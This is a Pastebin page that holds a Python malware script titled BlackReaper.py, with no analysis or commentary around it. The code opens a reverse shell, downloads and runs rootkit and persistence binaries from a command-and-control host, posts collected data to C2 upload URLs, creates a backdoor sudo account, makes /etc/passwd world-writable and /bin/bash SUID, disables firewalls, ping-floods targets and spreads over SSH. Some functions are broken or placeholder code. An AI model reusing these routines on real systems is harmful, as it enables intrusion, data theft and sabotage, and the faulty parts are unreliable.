API tools faq
paste
WhosYourDaddySec

BlackReaper.py

WhosYourDaddySec
Mar 29th, 2025
70
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 7.71 KB | None | 0 0
raw download clone embed print report
  1. import time
  2. import logging
  3. import subprocess
  4. import os
  5. import socket
  6. import requests
  7. import random
  8. import psutil
  9. from Crypto.Cipher import AES
  10. import base64
  11. import shutil
  12. from threading import Thread
  13. import bluetooth
  14. import signal
  15. import tempfile
  16. import io
  17. import uuid
  18. import string
  19. import hashlib
  20. from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
  21. from cryptography.hazmat.backends import default_backend
  22. from cryptography.hazmat.primitives import hashes
  23. from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
  24. APT_ENCRYPTION_KEY = os.urandom(32)
  25. EXFILTRATION_URL = "http://malicious.c2server.com/upload"
  26. MALICIOUS_USER = "malicious_user"
  27. MALICIOUS_PASSWORD = "malicious_password"
  28. FALLBACK_C2_URL = "http://secondary.c2server.com/upload"
  29. C2_SERVER_RETRIES = 3
  30. logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
  31. def generate_passkey(length=32):
  32.     return ''.join(random.choice(string.ascii_letters + string.digits + string.punctuation) for _ in range(length))
  33. def hash_passkey(passkey: str):
  34.     return hashlib.sha256(passkey.encode('utf-8')).hexdigest()
  35. def encrypt_data(data: str, key: bytes) -> str:
  36.     cipher = AES.new(key, AES.MODE_CBC, iv=os.urandom(16))
  37.     padded_data = data + (16 - len(data) % 16) * chr(16 - len(data) % 16)
  38.     ciphertext = cipher.encrypt(padded_data.encode('utf-8'))
  39.     return base64.b64encode(ciphertext).decode('utf-8')
  40. def decrypt_data(encrypted_data: str, key: bytes) -> str:
  41.     cipher = AES.new(key, AES.MODE_CBC, iv=os.urandom(16))
  42.     decoded_data = base64.b64decode(encrypted_data)
  43.     decrypted_data = cipher.decrypt(decoded_data)
  44.     padded_data = decrypted_data.decode('utf-8')
  45.     return padded_data.rstrip(padded_data[-1])
  46. def create_reverse_shell():
  47.     ip = "192.168.1.100"
  48.     port = 4444
  49.     while True:
  50.         try:
  51.             s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  52.             s.connect((ip, port))
  53.             while True:
  54.                 data = s.recv(1024)
  55.                 if data.decode("utf-8") == "exit":
  56.                     break
  57.                 output = subprocess.run(data, shell=True, capture_output=True)
  58.                 s.send(output.stdout + output.stderr)
  59.             s.close()
  60.         except Exception as e:
  61.             logging.error(f"Reverse shell error: {e}")
  62.             time.sleep(10)
  63. def install_persistence():
  64.     persistence_script = "/etc/init.d/persistent_malware.sh"
  65.     if not os.path.exists(persistence_script):
  66.         with open(persistence_script, "w") as f:
  67.             f.write("#!/bin/bash\n")
  68.             f.write(f"python3 {os.path.realpath(__file__)} &\n")
  69.         os.chmod(persistence_script, 0o755)
  70.         subprocess.run(["update-rc.d", "persistent_malware.sh", "defaults"])
  71. def install_fileless_persistence():
  72.     try:
  73.         subprocess.run(["curl", "http://malicious.c2server.com/fileless-malware", "-o", "/tmp/malicious.bin"])
  74.         subprocess.run(["chmod", "+x", "/tmp/malicious.bin"])
  75.         subprocess.run(["/tmp/malicious.bin"])
  76.     except Exception as e:
  77.         logging.error(f"Fileless persistence error: {e}")
  78. def exfiltrate_data():
  79.     data = collect_sensitive_data()
  80.     encrypted_data = encrypt_data(data, APT_ENCRYPTION_KEY)
  81.     for attempt in range(C2_SERVER_RETRIES):
  82.         try:
  83.             response = requests.post(EXFILTRATION_URL, data={'payload': encrypted_data})
  84.             logging.info(f"Exfiltrated data to {EXFILTRATION_URL}: {response.status_code}")
  85.             break
  86.         except requests.exceptions.RequestException as e:
  87.             logging.error(f"Exfiltration attempt {attempt+1} failed: {e}")
  88.             if attempt == C2_SERVER_RETRIES - 1:
  89.                 logging.error("Exfiltration failed after retries, switching to fallback server.")
  90.                 response = requests.post(FALLBACK_C2_URL, data={'payload': encrypted_data})
  91.                 logging.info(f"Exfiltrated data to fallback server {FALLBACK_C2_URL}: {response.status_code}")
  92.             time.sleep(5)
  93. def collect_sensitive_data():
  94.     sensitive_data = {
  95.         'passwords': 'password123',
  96.         'config': 'config_data'
  97.     }
  98.     return str(sensitive_data)
  99. def scan_for_bluetooth_devices():
  100.     nearby_devices = bluetooth.discover_devices(duration=8, lookup_names=True, flush_cache=True)
  101.     logging.info(f"Found {len(nearby_devices)} Bluetooth devices.")
  102.     return [name for addr, name in nearby_devices]
  103. def lateral_movement():
  104.     network_ips = get_local_network_ips()
  105.     for ip in network_ips:
  106.         try:
  107.             subprocess.run(f"ssh {MALICIOUS_USER}@{ip} 'bash -s' < /tmp/malicious_script.sh", shell=True)
  108.         except Exception as e:
  109.             logging.error(f"Error during lateral movement to {ip}: {e}")
  110. def get_local_network_ips():
  111.     result = subprocess.run(["nmap", "-sn", "192.168.1.0/24"], capture_output=True, text=True)
  112.     ips = []
  113.     for line in result.stdout.splitlines():
  114.         if "Nmap scan report" in line:
  115.             ip = line.split()[-1]
  116.             ips.append(ip)
  117.     return ips
  118. def execute_privilege_escalation():
  119.     try:
  120.         subprocess.run(["sudo", "chmod", "777", "/etc/passwd"])
  121.         subprocess.run(["sudo", "useradd", "-m", MALICIOUS_USER, "-s", "/bin/bash"])
  122.         subprocess.run(["sudo", "passwd", MALICIOUS_USER, MALICIOUS_PASSWORD])
  123.         subprocess.run(["sudo", "usermod", "-aG", "sudo", MALICIOUS_USER])
  124.     except Exception as e:
  125.         logging.error(f"Privilege escalation failed: {e}")
  126. def install_rootkit():
  127.     try:
  128.         subprocess.run(["curl", "http://malicious.c2server.com/rootkit", "-o", "/tmp/rootkit.bin"])
  129.         subprocess.run(["chmod", "+x", "/tmp/rootkit.bin"])
  130.         subprocess.run(["/tmp/rootkit.bin"])
  131.         logging.info("Rootkit installed successfully.")
  132.     except Exception as e:
  133.         logging.error(f"Error installing rootkit: {e}")
  134. def conceal_activity():
  135.     subprocess.run(["echo", "0", ">", "/proc/sys/kernel/randomize_va_space"])
  136.     subprocess.run(["sysctl", "-w", "kernel.randomize_va_space=0"])
  137. def hide_processes():
  138.     subprocess.run(["ps", "aux", "|", "grep", "malicious_process", ">", "/dev/null", "2>&1"])
  139. def self_replication():
  140.     current_process = subprocess.run(['ps', 'aux'], capture_output=True, text=True).stdout
  141.     malicious_code = open(__file__, 'r').read()
  142.     for line in current_process.splitlines():
  143.         pid = line.split()[1]
  144.         try:
  145.             subprocess.run(["scp", f"/proc/{pid}/exe", f"malicious_code_{pid}.sh"])
  146.         except Exception as e:
  147.             logging.error(f"Error during self-replication: {e}")
  148. def escalate_privileges():
  149.     subprocess.run(["chmod", "+s", "/bin/bash"])
  150. def install_rootkit_persistence():
  151.     subprocess.run(["curl", "http://malicious.c2server.com/rootkit", "-o", "/tmp/rootkit.bin"])
  152.     subprocess.run(["chmod", "+x", "/tmp/rootkit.bin"])
  153.     subprocess.run(["/tmp/rootkit.bin"])
  154. def disable_firewall():
  155.     subprocess.run(["iptables", "-F"])
  156.     subprocess.run(["ufw", "disable"])
  157. def shutdown_target_system():
  158.     subprocess.run(["shutdown", "-h", "now"])
  159. def start_dos_attack(target_ip):
  160.     while True:
  161.         try:
  162.             subprocess.run(f"ping {target_ip} -f", shell=True)
  163.         except Exception as e:
  164.             logging.error(f"Error during DoS attack: {e}")
  165.             break
  166. def create_advanced_persistence():
  167.     subprocess.run(["curl", "http://malicious.c2server.com/persistence", "-o", "/tmp/advanced_persistence.bin"])
  168.     subprocess.run(["chmod", "+x", "/tmp/advanced_persistence.bin"])
  169.     subprocess.run(["/tmp/advanced_persistence.bin"])
  170. def monitor_network_activity():
  171.     while True:
  172.         for conn in psutil.net_connections(kind='inet'):
  173.             logging.info(f"Connection from {conn.laddr} to {conn.raddr}")
  174.         time.sleep(5)
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!